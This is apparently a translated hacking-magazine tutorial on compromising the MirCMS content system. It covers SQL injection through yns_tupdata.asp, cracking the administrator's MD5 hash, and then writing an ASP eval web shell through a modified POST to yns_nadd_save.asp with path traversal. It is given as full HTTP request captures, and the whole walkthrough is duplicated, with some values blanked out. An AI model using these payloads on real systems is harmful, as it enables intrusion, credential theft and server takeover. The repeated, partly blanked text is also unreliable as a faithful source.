In the 6th issue of Black Defense in 2005, Lion Lion wrote about the vulnerability in the voting subsystem in MirCms. After reading it, I felt that since the system has vulnerabilities such as login verification errors, there should be other vulnerabilities that can be further exploited. This article takes advantage of these vulnerabilities in the system to obtain its WebShell.
1. Obtain the administrator account and password.
There is a SQL injection vulnerability in yns_tupdata.asp in the root directory of the website. We can use it to obtain the administrator's account and password and see the code snippet below.
If (("t_id") <> "") Then
rst__MMColParam = ("t_id")
End If
……
= "SELECT * FROM t_type WHERE t_id = " + Replace(rst__MMColParam, "’", "’’") + ""
The variable t_id filters only single quotes and is sent to the SQL statement, so that we can inject it in the form of 1 or 1=1. Open NBSI and enter the injection address http://xxx/yns_tupdata.asp?t_id=1 or 1=1. Since the source code of the system can be down online, it eliminates the process of guessing table names and column names. After guessing, we can get some administrator usernames and passwords.
Since the password is encrypted by MD5, and the background is also Session verification, we can only honestly crack its original password. As for cracking MD5, we can hang a dictionary of commonly used passwords and run it, and it depends on your luck^_^ Here I got a password of the account <If Cloud Knows>49ba59abbe56e057=>123456, OK! Just use this account to log in to the background. (Note: We only need to get an account with level 1, and generally the account password of this level is relatively simple^_^)
2. Further obtain WebShell
Let's take a look at the code snippet in yns_nadd_save.asp first.
mm_path = ((("t_dir").Value)&"/"&(("ts_dir").Value)&"/"
&("n_fpath")&"/"&("n_fname"))
…
Set fout = (mm_path)
pencat
After obtaining n_fname from the form, the program synthesizes the mm_path variable without performing any extension checks, and then uses the fso function to generate a file with n_fname as the file name. In this way, as long as we modify the value of n_fname to be , we can easily generate an ASP * on the server, and then we will see how the content of this file is generated.
N_Title=("n_title")
…
mm_template_path = ("templates/type_template/type_son_template/detail_template.htm")
…
set fso_line = (mm_template_path,1,True)
pencat=fso_line.readall
end if
pencat=replace(pencat,"t_title",n_title)
From the above we can know that the program reads the content in detail_template.htm, then replaces the relevant variables, and finally gets the content of the generated file. Here we use the replacement variable t_title, which is the replacement variable, to write our ASP * code. Let's try it, open WinSock Expert and fill in an article in the background. The content of the packet capture is as follows:
POST /yns_nadd_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/
-powerpoint, application/msword, */*
Referer: http://xxx/MirCMS_Add.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)
Host:
Content-Length:199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF
n_tid=52&n_tsid=56&n_sid=&n_title=test&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1
Here we change the value of n_fname to, and then change the value of n_title to the * we commonly use. Note that the ASP code written needs to be encoded in the form after using unicode. <SCRIPT%20RUNAT=SERVER%20LANGUAGE=
JAVASCRIPT>eval((’#’)%2B’’)</SCRIPT>, finally, don’t forget to recalculate the size of the packet and change the value of Content-Length. I believe everyone has already studied this part of the knowledge when studying the online upload vulnerability. Let me directly give my modification results.
POST /yns_nadd_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/
-powerpoint, application/msword, */*
Referer: http://xxx/MirCMS_Add.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)
Host:
Content-Length: 261
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF
n_tid=52&n_tsid=56&n_sid=&n_title=<SCRIPT%20RUNAT=SERVER%20LANGUAGE=JAVASCRIPT>eval((’#’)%2B’’)</SCRIPT>&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1
Finally, we use NC to submit our modified packet, and we can find our * at MirCMS_Html/xxx/Year-Month-Day/. Of course, if the website administrator compares BT, it may set that the ASP file cannot be run in the MirCMS_Html directory, but it doesn't matter. We just need to change the value of n_fname to.../../ to the root directory. With the rest of WebShell, you can do it ^_^
1. Obtain the administrator account and password.
There is a SQL injection vulnerability in yns_tupdata.asp in the root directory of the website. We can use it to obtain the administrator's account and password and see the code snippet below.
If (("t_id") <> "") Then
rst__MMColParam = ("t_id")
End If
……
= "SELECT * FROM t_type WHERE t_id = " + Replace(rst__MMColParam, "’", "’’") + ""
The variable t_id filters only single quotes and is sent to the SQL statement, so that we can inject it in the form of 1 or 1=1. Open NBSI and enter the injection address http://xxx/yns_tupdata.asp?t_id=1 or 1=1. Since the source code of the system can be down online, it eliminates the process of guessing table names and column names. After guessing, we can get some administrator usernames and passwords.
Since the password is encrypted by MD5, and the background is also Session verification, we can only honestly crack its original password. As for cracking MD5, we can hang a dictionary of commonly used passwords and run it, and it depends on your luck^_^ Here I got a password of the account <If Cloud Knows>49ba59abbe56e057=>123456, OK! Just use this account to log in to the background. (Note: We only need to get an account with level 1, and generally the account password of this level is relatively simple^_^)
2. Further obtain WebShell
Let's take a look at the code snippet in yns_nadd_save.asp first.
mm_path = ((("t_dir").Value)&"/"&(("ts_dir").Value)&"/"
&("n_fpath")&"/"&("n_fname"))
…
Set fout = (mm_path)
pencat
After obtaining n_fname from the form, the program synthesizes the mm_path variable without performing any extension checks, and then uses the fso function to generate a file with n_fname as the file name. In this way, as long as we modify the value of n_fname to be , we can easily generate an ASP * on the server, and then we will see how the content of this file is generated.
N_Title=("n_title")
…
mm_template_path = ("templates/type_template/type_son_template/detail_template.htm")
…
set fso_line = (mm_template_path,1,True)
pencat=fso_line.readall
end if
pencat=replace(pencat,"t_title",n_title)
From the above we can know that the program reads the content in detail_template.htm, then replaces the relevant variables, and finally gets the content of the generated file. Here we use the replacement variable t_title, which is the replacement variable, to write our ASP * code. Let's try it, open WinSock Expert and fill in an article in the background. The content of the packet capture is as follows:
POST /yns_nadd_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/
-powerpoint, application/msword, */*
Referer: http://xxx/MirCMS_Add.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)
Host:
Content-Length:199
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF
n_tid=52&n_tsid=56&n_sid=&n_title=test&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1
Here we change the value of n_fname to, and then change the value of n_title to the * we commonly use. Note that the ASP code written needs to be encoded in the form after using unicode. <SCRIPT%20RUNAT=SERVER%20LANGUAGE=
JAVASCRIPT>eval((’#’)%2B’’)</SCRIPT>, finally, don’t forget to recalculate the size of the packet and change the value of Content-Length. I believe everyone has already studied this part of the knowledge when studying the online upload vulnerability. Let me directly give my modification results.
POST /yns_nadd_save.asp HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/
-powerpoint, application/msword, */*
Referer: http://xxx/MirCMS_Add.asp
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Maxthon; .NET CLR 1.1.4322)
Host:
Content-Length: 261
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSCQTAQQB=JLOPEBEBAFPEBBJAJCGHKBCF
n_tid=52&n_tsid=56&n_sid=&n_title=<SCRIPT%20RUNAT=SERVER%20LANGUAGE=JAVASCRIPT>eval((’#’)%2B’’)</SCRIPT>&n_author=%C8%E7%B9%FB%D4%C6%D6%AA%B5%C0&n_mpic=&n_rpic=&n_fname=&n_fpath=2005-6-6&n_date=2005-6-6+6%3A50%3A22&n_content=ttt&MM_insert=form1
Finally, we use NC to submit our modified packet, and we can find our * at MirCMS_Html/xxx/Year-Month-Day/. Of course, if the website administrator compares BT, it may set that the ASP file cannot be run in the MirCMS_Html directory, but it doesn't matter. We just need to change the value of n_fname to.../../ to the root directory. With the rest of WebShell, you can do it ^_^